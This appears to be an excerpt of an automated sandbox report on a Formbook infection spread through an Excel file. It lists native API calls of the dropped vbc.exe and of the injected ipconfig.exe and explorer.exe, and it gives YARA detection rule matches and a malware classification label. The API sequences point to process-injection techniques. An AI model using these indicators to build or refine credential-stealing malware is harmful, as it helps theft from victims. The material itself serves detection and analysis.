          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CFA50 NtEnumerateValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CFBE8 NtQueryVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CFB50 NtCreateKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CFC30 NtOpenProcess,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CFC48 NtSetInformationFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008D0C40 NtGetContextThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008D1D80 NtSuspendThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CFD5C NtEnumerateKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CFE24 NtWriteVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CFFFC NtCreateProcessEx,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CFF34 NtQueueApcThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_1_004181C0 NtCreateFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_1_00418270 NtReadFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_1_004182F0 NtClose,
          Source: C:\Users\Public\vbc.exeCode function: 5_1_004183A0 NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041817A NtCreateFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_1_004181BA NtCreateFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041826A NtReadFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020B00C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020B07AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AF900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AF9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020B0048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020B0060 NtQuerySection,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020B0078 NtResumeThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020B10D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020B010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020B1148 NtOpenThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020B01D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFAB8 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFAD0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AF8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AF938 NtWriteFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020B1930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020B0C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFC90 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020B1D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_000981C0 NtCreateFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00098270 NtReadFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_000982F0 NtClose,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0009817A NtCreateFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_000981BA NtCreateFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0009826A NtReadFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_01E4632E NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_01E467C7 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_01E46332 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_01E467C2 NtQueryInformationProcess,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00403486 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00407272
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00406A9B
          Source: C:\Users\Public\vbc.exeCode function: 4_2_72E31A98
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B808
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00401030
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041A2AA
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041BBA8
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00408C60
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041BD28
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00402D8E
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00402D90
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041C785
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00402FB0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008DE0C6
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0090D005
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008E3040
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008F905A
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0095D06D
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008DE2E9
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00981238
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009863BF
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008DF3CF
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009063DB
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008E2305
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008E7353
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0092A37B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008F1489
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00915485
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0096443E
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0091D47D
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009605E3
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008FC5F0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008E351F
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00926540
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008E4680
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008EE6C1
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0092A634
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00982622
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0096579A
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008EC7BC
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009157C3
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0095F8C4
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0097F8EE
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008EC85C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0090286D
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0098098E
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008E29B2
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008F69FE
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00965955
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0096394B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00993A83
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0098CBA4
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0096DBDA
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008DFBD7
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00907B00
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0097FDDD
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00910D3B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008ECD5B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00912E2F
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008FEE4C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0097CFB1
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00952FDC
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008F0F3F
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0090DF7C
          Source: C:\Users\Public\vbc.exeCode function: 5_1_00401030
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041A2AA
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041C785
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041B808
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041BBA8
          Source: C:\Users\Public\vbc.exeCode function: 5_1_00408C60
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041BD28
          Source: C:\Users\Public\vbc.exeCode function: 5_1_00402D8E
          Source: C:\Users\Public\vbc.exeCode function: 5_1_00402D90
          Source: C:\Users\Public\vbc.exeCode function: 5_1_00402FB0
          Source: C:\Windows\explorer.exeCode function: 6_2_029348F9
          Source: C:\Windows\explorer.exeCode function: 6_2_029372FF
          Source: C:\Windows\explorer.exeCode function: 6_2_02939062
          Source: C:\Windows\explorer.exeCode function: 6_2_0293B5B2
          Source: C:\Windows\explorer.exeCode function: 6_2_0293A7C7
          Source: C:\Windows\explorer.exeCode function: 6_2_02934902
          Source: C:\Windows\explorer.exeCode function: 6_2_02937302
          Source: C:\Windows\explorer.exeCode function: 6_2_02935362
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02161238
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020BE2E9
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020C2305
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020C7353
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0210A37B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_021663BF
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020BF3CF
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020E63DB
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020ED005
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020C3040
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020D905A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0213D06D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020BE0C6
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0210A634
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02162622
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020C4680
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020CE6C1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0214579A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020CC7BC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020F57C3
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0214443E
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020FD47D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020D1489
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020F5485
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020C351F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02106540
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_021405E3
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020DC5F0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02173A83
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020E7B00
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0216CBA4
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0214DBDA
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020BFBD7
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020CC85C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020E286D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0213F8C4
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0215F8EE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02145955
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0214394B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0216098E
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020C29B2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020D69FE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020F2E2F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020DEE4C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020D0F3F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020EDF7C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0215CFB1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02132FDC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020F0D3B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020CCD5B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0215FDDD
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0009A2AA
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0009C785
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00088C60
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00082D8E
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00082D90
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00082FB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_01E467C7
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_01E45062
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_01E41362
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_01E43302
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_01E432FF
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_01E475B2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_01E40902
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_01E408F9
          Source: QTN3C2AF414EDF9_041873.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 020BE2A8 appears 38 times
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 0212F970 appears 84 times
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 02103F92 appears 132 times
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 0210373B appears 245 times
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 020BDF5C appears 121 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00419F70 appears 40 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 008DE2A8 appears 38 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0041A0A0 appears 38 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00923F92 appears 132 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 008DDF5C appears 122 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0094F970 appears 84 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0092373B appears 245 times
          Source: 00000005.00000001.2164030475.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000001.2164030475.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2375705185.00000000001F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2375705185.00000000001F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2205793716.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2205793716.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2167067209.0000000002900000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2167067209.0000000002900000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2205774849.00000000003A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2205774849.00000000003A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2375743991.00000000002B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2375743991.00000000002B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2205709374.0000000000230000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2205709374.0000000000230000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.vbc.exe.2900000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.vbc.exe.2900000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.vbc.exe.2900000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.vbc.exe.2900000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: explorer.exe, 00000006.00000000.2182158267.0000000003C40000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
          Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@9/12@8/6
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00403486 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
